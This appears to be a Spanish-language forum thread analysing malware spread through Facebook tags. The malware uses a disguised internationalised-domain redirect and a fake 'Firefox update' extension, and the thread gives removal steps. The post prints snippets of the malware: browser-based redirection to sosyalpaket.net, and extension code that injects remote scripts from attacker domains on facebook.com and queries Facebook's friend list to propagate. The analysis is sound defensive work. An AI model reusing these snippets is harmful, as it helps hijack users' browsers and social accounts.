Malware se propaga mediante "etiquetas" en Facebook

El celular no deja de sonar por las múltiples notificaciones que recibía y todas eran la por las  etiquetas que recibía mi cuenta de Facebook, joooder y todas tenían una dirección algo extraña. www.ناماراتاماراتامارات.امارات  y según google es Persa... que rara dirección. Así que agarre el ordenador y me puse a averiguar porque me daba mala espina. Vi la dirección de la redirección y era esta www.xn--mgbaaaaaaaaydd5fee22afff.xn--mgbaam7a8h  WDF...!! Pero seguí mas adelante tome la dirección www.sosyalpaket.net  al parecer la primera dirección era el camuflaje aquella te envía a otra página según el navegador que tengas. Con el Siguiente código:

var is_opera=navigator.userAgent.toLowerCase().indexOf("opera")>-1;
var is_chrome=navigator.userAgent.toLowerCase().indexOf("chrome")>-1;
var is_safari=navigator.userAgent.toLowerCase().indexOf("safari")>-1;
var is_firefox=navigator.userAgent.toLowerCase().indexOf("firefox")>-1;
if(is_chrome){inst="http://www.sosyalpaket.net/chrome.php"}
else
if(is_firefox){inst="http://www.sosyalpaket.net/firefox.php"}
else
if(is_opera){inst="http://www.sosyalpaket.net/chrome.php"}
else
{var inst="http://www.sosyalpaket.net/chrome.php"}

Lo que te envía es a descargar un complemento según el navegador que tengas, en este caso lo teste con firefox y me envió a descargar un complemento.

Con el siguiente mensaje:

Por favor, botón Actualizar Firefox Actualice.
Debido a los errores del sistema y vulnerabilidades de seguridad que se requieren pulsando el botón Recargar
Instalar el plug-in de Firefox Update.
Siempre y cuando usted no ha actualizado las características del sitio faydalanamayacaksınız.


Lo que me dio risa fue ese mensaje de "Debido a los errores del sistema y vulnerabilidades de seguridad" jajajaja le seguiremos la corriente una vez descargado abrimos el complemento con winrar pero antes lo escaneamos para ver si este malware ya fue reportado.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

y el resultado fue 6 / 45 así que por el momento no todos los antimalware lo reconocen. Ya que lo tenía abierto empecé a entender las líneas de códigos.


Y encontré algo que me resulto familiar

if(location.hostname.indexOf("facebook.com") >= 0){

addJavascript('http://sosyalpaket.net/yeni.php');

addJavascript('http://fbmedyahizmetleri.com/bakgel.php');

addJavascript('http://facebookhizmetlerim.com/user.php');

}

En el user.php me tope con:

"https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }

else { xmlhttp.open("GET", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }

Es por ese medio por el cual se propaga y si llegas a descargar por que eres de aquellas personas que le da click a todo button que ve solo basta con dirigirte a tu navegador al apartado extensión o complemento según sea el caso y verificar una similar a ello.


Lo más razonable es eliminarlo.
Saludos

Buena  info

Buenísimo aporte, y gran descubrimiento, gracias por aportarlo, ahora nadamás nos queda darlo a conocer para que todos se cuiden.
Saludos.

En el navegador de Gogle Chrome el malware se encuentra en : C:\Users\"Uusario"\AppData\Local\Google\Chrome\User Data\Default\Extensions (en Windows 7)
Pues si lo eliminan directamente del navegador no se podra pues tiene redireciones al entrar a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta  al WebStore..!! Asique es mejor eliminarlo manualmente.

Lo interezante del complementoen Google  chrome posee una especie de "bypass" que hace al que se instale como si fuera del un complemento del WebStore (testeado en WinXp) pues no necesita la dichosa "--enable-easy-off-store-extension-install". algo que muy interesante.

Saludos...
atte.: CodePunisher

Muy interesante el post . podrias subir la muestra del malware a algun lado ? me interesaria hacerle un research en especial a ese supuesto "bypass" de chrome saludos

muy buena explicacion sobre todo con las imagenes que dejan ver lo necesario ... pero bueno si tiene alguien tutorial sobre esto y de likejacking seriabueno q lo incluyan aca

excelente informacion ...... codepunisher

interessante informacion rs

mmm muy bueno pero los codigos php de donde los sacaste?
o los adivinaste
saludos